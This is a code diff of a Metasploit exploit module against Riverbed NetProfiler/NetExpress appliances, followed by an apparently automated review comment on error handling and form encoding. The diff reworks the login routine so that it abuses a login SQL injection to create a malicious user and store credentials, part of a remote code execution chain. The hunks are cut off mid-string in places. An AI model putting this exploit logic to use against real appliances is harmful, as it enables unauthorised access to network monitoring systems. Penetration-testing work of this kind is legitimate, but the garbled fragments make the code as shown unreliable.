diff --git a/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb b/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
index e9cff50052..1f771afafd 100644
--- a/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
+++ b/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
@@ -79,8 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def exploit
- print_status("Creating malicious user through login SQLi")
- create_user
 print_status("Attempting log in to target appliance")
 @sessid = do_login
@@ -128,6 +126,83 @@ class MetasploitModule < Msf::Exploit::Remote
 end
+ def do_login
+
+ uname = datastore['RIVERBED_USER']
+ passwd = datastore['RIVERBED_PASSWORD']
+
+ nonce, sessid_cookie_preauth = get_nonce
+ post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,'/index.php'),
+ 'cookie' => "SESSID=#{sessid_cookie_preauth}",
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'encode_params' => false,
+ 'data' => post_data
+ })
+
+ # Exploit login SQLi if credentials are not valid.
+ if res && res.body && res.body.include?('
'POST',
+ 'uri' => normalize_uri(target_uri.path,'/index.php'),
+ 'cookie' => "SESSID=#{sessid_cookie_preauth}",
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'encode_params' => false,
+ 'data' => post_data
+ })
+
+ sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
+ print_status("Saving login credentials into Metasploit DB")
+ report_cred(uname, passwd)
+ else
+ print_status("Valid login credentials provided. Successfully logged in")
+ sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
+ print_status("Saving login credentials into Metasploit DB")
+ report_cred(uname, passwd)
+ end
+
+ return sessid_cookie
+
+ end
+
+ def report_cred(username, password)
+ # Function used to save login credentials into Metasploit database
+ service_data = {
+ address: rhost,
+ port: rport,
+ service_name: ssl ? 'https' : 'http',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ module_fullname: self.fullname,
+ origin_type: :service,
+ username: username,
+ private_data: password,
+ private_type: :password
+ }.merge(service_data)
+
+ credential_core = create_credential(credential_data)
+
+ login_data = {
+ core: credential_core,
+ last_attempted_at: DateTime.now,
+ status: Metasploit::Model::Login::Status::SUCCESSFUL
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+
 def create_user
 # Function exploiting login SQLi to create a malicious user
 username = datastore['RIVERBED_USER']
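Review bot: In the new do_login, the `else` branch of `if res && res.body && res.body.include?(...)` is also reached when `res` is nil (no response at all), yet it prints "Valid login credentials provided" and then calls `res.get_cookies`, which raises NoMethodError instead of failing cleanly; guard before the branch with `fail_with(Failure::Unreachable, 'No response to login request') unless res&.body`. The `sessid_cookie = (res.get_cookies || '')...` / `print_status` / `report_cred(uname, passwd)` triple is repeated verbatim in both branches and can be hoisted below the `if`, leaving only the SQLi retry inside it. The middle of the hunk between the include? check and the second POST is not visible here, so the retry path is assumed to reassign `res` before the cookie scan. Separately, `uname` and `passwd` are interpolated into `post_data` with `'encode_params' => false`, so a password containing `&`, `=` or `%` corrupts the form body; `Rex::Text.uri_encode(passwd)` (and likewise for `uname`) in the string interpolation, or a comment documenting that constraint, would make the behaviour explicit.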
@@ -180,34 +255,6 @@ class MetasploitModule < Msf::Exploit::Remote
 return payload
 end
- def do_login
- # Function used to login and create a valid session
- uname = datastore['RIVERBED_USER']
- passwd = datastore['RIVERBED_PASSWORD']
- nonce, sessid_cookie_preauth = get_nonce
-
- post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
-
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path,'/index.php'),
- 'cookie' => "SESSID=#{sessid_cookie_preauth}",
- 'ctype' => 'application/x-www-form-urlencoded',
- 'encode_params' => false,
- 'data' => post_data
- })
-
- if res && res.body && res.body.include?('